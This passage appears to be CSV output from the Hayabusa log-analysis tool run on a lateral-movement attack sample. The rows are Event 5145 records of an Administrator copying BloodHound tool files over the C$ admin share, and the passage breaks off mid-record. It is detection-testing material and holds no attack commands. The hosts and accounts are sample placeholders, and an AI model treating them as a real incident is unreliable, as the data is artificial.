2019-03-18 23:23:24.558 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\web | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.558 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-util-is | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.568 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-util-is\lib | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.568 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\crc-32 | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.568 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\crc-32\bin | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.578 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\crc-32\types | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.578 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dagre | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.578 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dagre\dist | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.588 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dagre\lib | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.588 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dagre\lib\data | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.588 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dagre\lib\order | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.588 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dagre\lib\position | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.598 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dagre\lib\rank | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.598 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dagre\node_modules | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.598 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dagre\node_modules\lodash | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.598 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dom-helpers | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.608 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dom-helpers\class | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.608 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dom-helpers\events | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.608 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dom-helpers\query | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.608 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dom-helpers\style | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.608 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dom-helpers\transition | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.618 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dom-helpers\util | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.618 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dot-prop | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.618 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\duplexer2 | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.618 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\electron-store | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.618 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\env-paths | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.628 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\eventemitter2 | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.628 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\eventemitter2\lib | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.628 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\exenv | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.628 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\exit-on-epipe | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.638 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\file-type | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.638 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\find-up | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.638 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\fontfaceobserver | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.638 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\fontfaceobserver\src | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.638 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\frac | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.648 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\fs.realpath | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.648 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: 
\??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\fstream | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.648 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\fstream\examples | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.648 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\fstream\lib | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.658 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\glob | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.658 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | 
Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\graceful-fs | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.668 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\graphlib | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.668 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\graphlib\dist | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.668 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\graphlib\lib | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.678 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 
Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\graphlib\lib\alg | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.678 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\graphlib\lib\data | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.678 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\graphlib\node_modules | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.678 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\graphlib\node_modules\lodash | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.688 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ 
| Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\hyphenate-style-name | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.688 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\hyphenate-style-name\.nyc_output | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.688 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\image-size | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.688 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\image-size\bin | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.698 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: 
Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\image-size\lib | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.698 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\image-size\lib\types | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:24.698 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\image-type | IP Addr: 10.0.2.15 | LID: 